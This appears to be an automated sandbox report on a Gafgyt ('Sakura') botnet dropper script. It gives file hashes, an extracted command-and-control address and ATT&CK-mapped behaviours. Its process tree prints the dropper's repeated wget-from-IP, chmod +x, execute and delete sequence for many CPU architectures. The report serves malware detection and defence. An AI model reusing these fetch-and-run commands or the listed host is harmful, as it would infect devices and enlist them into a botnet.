Analysis
-
max time kernel
129s -
max time network
133s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
11-12-2024 02:24
Static task
static1
Behavioral task
behavioral1
Sample
36051b864ed4b1edfd7873f564442ee10144da71b59286e6629dd16226660454.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
36051b864ed4b1edfd7873f564442ee10144da71b59286e6629dd16226660454.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
36051b864ed4b1edfd7873f564442ee10144da71b59286e6629dd16226660454.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
36051b864ed4b1edfd7873f564442ee10144da71b59286e6629dd16226660454.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
36051b864ed4b1edfd7873f564442ee10144da71b59286e6629dd16226660454.sh
-
Size
2KB
-
MD5
281cd1f53a61fc59ed834b72363fed74
-
SHA1
7f893a0bbd0331405e0dbee4a69a63faf92911a4
-
SHA256
36051b864ed4b1edfd7873f564442ee10144da71b59286e6629dd16226660454
-
SHA512
622edede06210a694a16db2a1863baec85fd23d31630b9ebf1fab4efbb682f154decbf688c403ea4a187ba6a3d6e61a3ae5045dff8930763b25eb184408f6bcb
Malware Config
Extracted
gafgyt
93.123.85.251:12345
Signatures
-
Detected Gafgyt variant 11 IoCs
resource yara_rule behavioral4/files/fstream-1.dat family_gafgyt behavioral4/files/fstream-2.dat family_gafgyt behavioral4/files/fstream-3.dat family_gafgyt behavioral4/files/fstream-4.dat family_gafgyt behavioral4/files/fstream-5.dat family_gafgyt behavioral4/files/fstream-6.dat family_gafgyt behavioral4/files/fstream-7.dat family_gafgyt behavioral4/files/fstream-8.dat family_gafgyt behavioral4/files/fstream-9.dat family_gafgyt behavioral4/files/fstream-10.dat family_gafgyt behavioral4/files/fstream-13.dat family_gafgyt -
Gafgyt family
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 797 chmod 811 chmod 723 chmod 754 chmod 774 chmod 779 chmod 786 chmod 834 chmod 738 chmod 748 chmod 759 chmod 764 chmod 769 chmod -
Executes dropped EXE 13 IoCs
ioc pid Process /tmp/m-i.p-s.Sakura 725 m-i.p-s.Sakura /tmp/m-p.s-l.Sakura 739 m-p.s-l.Sakura /tmp/s-h.4-.Sakura 749 s-h.4-.Sakura /tmp/x-8.6-.Sakura 755 x-8.6-.Sakura /tmp/a-r.m-6.Sakura 760 a-r.m-6.Sakura /tmp/x-3.2-.Sakura 765 x-3.2-.Sakura /tmp/a-r.m-7.Sakura 770 a-r.m-7.Sakura /tmp/p-p.c-.Sakura 775 p-p.c-.Sakura /tmp/i-5.8-6.Sakura 780 i-5.8-6.Sakura /tmp/m-6.8-k.Sakura 788 m-6.8-k.Sakura /tmp/p-p.c-.Sakura 798 p-p.c-.Sakura /tmp/a-r.m-4.Sakura 812 a-r.m-4.Sakura /tmp/a-r.m-5.Sakura 836 a-r.m-5.Sakura -
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/route m-p.s-l.Sakura -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/route m-p.s-l.Sakura -
Writes file to tmp directory 13 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/s-h.4-.Sakura wget File opened for modification /tmp/x-8.6-.Sakura wget File opened for modification /tmp/a-r.m-7.Sakura wget File opened for modification /tmp/i-5.8-6.Sakura wget File opened for modification /tmp/m-i.p-s.Sakura wget File opened for modification /tmp/m-p.s-l.Sakura wget File opened for modification /tmp/p-p.c-.Sakura wget File opened for modification /tmp/m-6.8-k.Sakura wget File opened for modification /tmp/p-p.c-.Sakura wget File opened for modification /tmp/a-r.m-4.Sakura wget File opened for modification /tmp/a-r.m-5.Sakura wget File opened for modification /tmp/a-r.m-6.Sakura wget File opened for modification /tmp/x-3.2-.Sakura wget
Processes
-
/tmp/36051b864ed4b1edfd7873f564442ee10144da71b59286e6629dd16226660454.sh/tmp/36051b864ed4b1edfd7873f564442ee10144da71b59286e6629dd16226660454.sh1⤵PID:710
-
/usr/bin/wgetwget http://93.123.85.251/m-i.p-s.Sakura2⤵
- Writes file to tmp directory
PID:716
-
-
/bin/chmodchmod +x m-i.p-s.Sakura2⤵
- File and Directory Permissions Modification
PID:723
-
-
/tmp/m-i.p-s.Sakura./m-i.p-s.Sakura2⤵
- Executes dropped EXE
PID:725
-
-
/bin/rmrm -rf m-i.p-s.Sakura2⤵PID:728
-
-
/usr/bin/wgetwget http://93.123.85.251/m-p.s-l.Sakura2⤵
- Writes file to tmp directory
PID:730
-
-
/bin/chmodchmod +x m-p.s-l.Sakura2⤵
- File and Directory Permissions Modification
PID:738
-
-
/tmp/m-p.s-l.Sakura./m-p.s-l.Sakura2⤵
- Executes dropped EXE
- Reads system routing table
- Reads system network configuration
PID:739
-
-
/bin/rmrm -rf m-p.s-l.Sakura2⤵PID:742
-
-
/usr/bin/wgetwget http://93.123.85.251/s-h.4-.Sakura2⤵
- Writes file to tmp directory
PID:743
-
-
/bin/chmodchmod +x s-h.4-.Sakura2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/s-h.4-.Sakura./s-h.4-.Sakura2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm -rf s-h.4-.Sakura2⤵PID:751
-
-
/usr/bin/wgetwget http://93.123.85.251/x-8.6-.Sakura2⤵
- Writes file to tmp directory
PID:752
-
-
/bin/chmodchmod +x x-8.6-.Sakura2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/x-8.6-.Sakura./x-8.6-.Sakura2⤵
- Executes dropped EXE
PID:755
-
-
/bin/rmrm -rf x-8.6-.Sakura2⤵PID:757
-
-
/usr/bin/wgetwget http://93.123.85.251/a-r.m-6.Sakura2⤵
- Writes file to tmp directory
PID:758
-
-
/bin/chmodchmod +x a-r.m-6.Sakura2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/a-r.m-6.Sakura./a-r.m-6.Sakura2⤵
- Executes dropped EXE
PID:760
-
-
/bin/rmrm -rf a-r.m-6.Sakura2⤵PID:762
-
-
/usr/bin/wgetwget http://93.123.85.251/x-3.2-.Sakura2⤵
- Writes file to tmp directory
PID:763
-
-
/bin/chmodchmod +x x-3.2-.Sakura2⤵
- File and Directory Permissions Modification
PID:764
-
-
/tmp/x-3.2-.Sakura./x-3.2-.Sakura2⤵
- Executes dropped EXE
PID:765
-
-
/bin/rmrm -rf x-3.2-.Sakura2⤵PID:767
-
-
/usr/bin/wgetwget http://93.123.85.251/a-r.m-7.Sakura2⤵
- Writes file to tmp directory
PID:768
-
-
/bin/chmodchmod +x a-r.m-7.Sakura2⤵
- File and Directory Permissions Modification
PID:769
-
-
/tmp/a-r.m-7.Sakura./a-r.m-7.Sakura2⤵
- Executes dropped EXE
PID:770
-
-
/bin/rmrm -rf a-r.m-7.Sakura2⤵PID:772
-
-
/usr/bin/wgetwget http://93.123.85.251/p-p.c-.Sakura2⤵
- Writes file to tmp directory
PID:773
-
-
/bin/chmodchmod +x p-p.c-.Sakura2⤵
- File and Directory Permissions Modification
PID:774
-
-
/tmp/p-p.c-.Sakura./p-p.c-.Sakura2⤵
- Executes dropped EXE
PID:775
-
-
/bin/rmrm -rf p-p.c-.Sakura2⤵PID:777
-
-
/usr/bin/wgetwget http://93.123.85.251/i-5.8-6.Sakura2⤵
- Writes file to tmp directory
PID:778
-
-
/bin/chmodchmod +x i-5.8-6.Sakura2⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/i-5.8-6.Sakura./i-5.8-6.Sakura2⤵
- Executes dropped EXE
PID:780
-
-
/bin/rmrm -rf i-5.8-6.Sakura2⤵PID:782
-
-
/usr/bin/wgetwget http://93.123.85.251/m-6.8-k.Sakura2⤵
- Writes file to tmp directory
PID:783
-
-
/bin/chmodchmod +x m-6.8-k.Sakura2⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/m-6.8-k.Sakura./m-6.8-k.Sakura2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm -rf m-6.8-k.Sakura2⤵PID:791
-
-
/usr/bin/wgetwget http://93.123.85.251/p-p.c-.Sakura2⤵
- Writes file to tmp directory
PID:792
-
-
/bin/chmodchmod +x p-p.c-.Sakura2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/p-p.c-.Sakura./p-p.c-.Sakura2⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm -rf p-p.c-.Sakura2⤵PID:801
-
-
/usr/bin/wgetwget http://93.123.85.251/a-r.m-4.Sakura2⤵
- Writes file to tmp directory
PID:803
-
-
/bin/chmodchmod +x a-r.m-4.Sakura2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/a-r.m-4.Sakura./a-r.m-4.Sakura2⤵
- Executes dropped EXE
PID:812
-
-
/bin/rmrm -rf a-r.m-4.Sakura2⤵PID:815
-
-
/usr/bin/wgetwget http://93.123.85.251/a-r.m-5.Sakura2⤵
- Writes file to tmp directory
PID:817
-
-
/bin/chmodchmod +x a-r.m-5.Sakura2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/a-r.m-5.Sakura./a-r.m-5.Sakura2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm -rf a-r.m-5.Sakura2⤵PID:840
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
98KB
MD552bc63fd650de35bc245573ae44ea364
SHA16e368a8a81f40675b449703bce52bee1533dd0e4
SHA2562f530823763542f3b6fd2a9a3a32a44fdab8f266edc7dbbf1551045fdb72c867
SHA5126caa8497bff776038ae51070f237e71ea13feeb3f82bae1a3c2314be9eb757aee96254fdb938d5892ebddb04ff15e958fef27a8ade93d5f1d08e931dc49d0a58
-
Filesize
118KB
MD502edcf81f90fa0073933ff444cf9c551
SHA1948e1b1e5f9d7bd281c6e7bab0afece688996461
SHA25698e7a67e16f8ce69c4f3601e484e3325491a4a2fa56bebe321621850e8774a24
SHA5129178b1b5573b77a3e097b844a6ef5e41144ab1ebe83c311230d2cfcde7d9c84dac7e0225a4b78ff324027e86520889af2578cbb0dba8f9b13f7191ec274b118a
-
Filesize
91KB
MD57d8a00b361f81daf7c2777262e112c05
SHA13fb65dab04dbe9ba6fadbc58e3944018a6a9e153
SHA2567dac9097a25a98ae0c4a744f76b9a88a7fed4b18836b4185a03cb99c8ff3c2d7
SHA51298198bd221b453892e4e7829ea2c7e996643b623718ed9263610267669d5aa6abc2febe6fdfc1327a4a98dd094f1dd396c8567897437525fba4acdb89e6a4e4c
-
Filesize
96KB
MD5321dae9a58666dd236275525aa62c400
SHA1ab4acda3cdbd1874ae2c1c1ecb4fb7110e52848d
SHA256bb10d67b8cb5f4b94fb31b4dd9fda5c93b08a5f09f54ad56a171dd7ece54d7d8
SHA5125a7c4c20371d9384994e06b0d93fb3b863520480a41737b3df722331e9ddfb4e94abc3143b473a868416d538469a358aaf66bf1e0d1a62d6f46648a63a341f2a
-
Filesize
156KB
MD5d92ea94f6188bf97a1c710facb42b999
SHA1abf1052505dea67fe274600c83d0ef0a972c6cbf
SHA256d357d3c0ff0544d9e76dd260e1aefcbd45940e98802e41f7209d3a9c4a1c0dc8
SHA5124fc4557417225491ada7bbe1e21ccda2af9e29c9d828f3e8521e4784ef097975c67be4369cf574211bf9f8c0ba1f244d48341769f7d028341a733946ea5bbdaf
-
Filesize
123KB
MD5bb80b6c414e11d03d63ffdbf7b47aa76
SHA1e688615f95d5809c4588e19ade9eb0bd43bbad93
SHA256d2eb9394cb5b769124b55695df67009d2ceea9367aa9b8d69ec7bd921d8e151f
SHA5125d09788e662b8841b90c3c33bdd9ef70cb759e8b9bd8e1e9a86fa7b39327ccb7c558502d914016a46e1566c74e3c224e51965a83d79746fbf13a86b51ab6a069
-
Filesize
123KB
MD5397bcfb06013b5359f9e344b30f9a961
SHA12c531fb14397438f68dea2ad02c769b0270b9f47
SHA2566ac57203130207f6d1b33fd710356dbe5dd56fee6ddebe607a8dc3ee152bccfb
SHA5123c72765117c9be73f67d9b539d6e1fc7e1a4e0a89fd876bdcb43fa23da7a47f02ac544c7ea6abb2cef0fec50a2a6dedee4e4c46d371d0fd6d3a1c6b3b9ce381c
-
Filesize
105KB
MD531f1e73d6d69bd7048efc723ba68dc43
SHA127ea7191b90d04baaf87af1b0ec2dda464702fac
SHA256ea4b669059899755ae9661c63f39505f62cf6e31509126bfa897fc24d35cd347
SHA512eae2def2f13ba9684e8be10751a9d23b02ab8389981832807143e045cf81740a8e38c3b53ead1efd7fcafab7b194c605915b2ffa1d9ec766681286e9ead905f3
-
Filesize
86KB
MD559087681140ec73425248bbd2e35553a
SHA1cc89aa88bd6e02c6a34c532f711c1e8f6ee681e9
SHA2567cf457f6e3a54354c75ed474f6712b08e8abf3f697cc8c08d578721a265a7deb
SHA512bccc9a8974e9e1d93d99c78ce57005ff78784b7fb65855f2acc97c5c81e2361f4801cb621fcdd5ac656ef294b8642085484be64c4feadfc9c664af4d4f4b6b82
-
Filesize
83KB
MD50edc673eda0ed6fc89b1a1dc8de894be
SHA1d3cf741bb069718950040b4b74317de61b4b66ad
SHA2567a6489e4a5b25915b47b204aecc3afb0e3f51f6f33059e8333b8e0300b4ca2a1
SHA512342d06111a490d97e4f2926b6b35d989993bc12e9709d736bae4ce317f24fad0b3800cee7e13a3ee788096ac3fcaee1e041ad6fe9769c9232794da2eb2eeef03
-
Filesize
92KB
MD57981a3a60ab91469df013ca383906bd9
SHA1dcbcd34f841284a0f7f52c5a0e17d44c059d5b96
SHA256e03adb20dced14f894c81f977f244215ed95d821ee8d3462edd2c29e40589d27
SHA51251956996c5d19a3c6c932dfb8a8c4dac0153d7601e80509dc31d1b843f37eaeb999ea72678140e2e7a2a64ade667ab7700c65eb0771400e80302e9ef25b0483c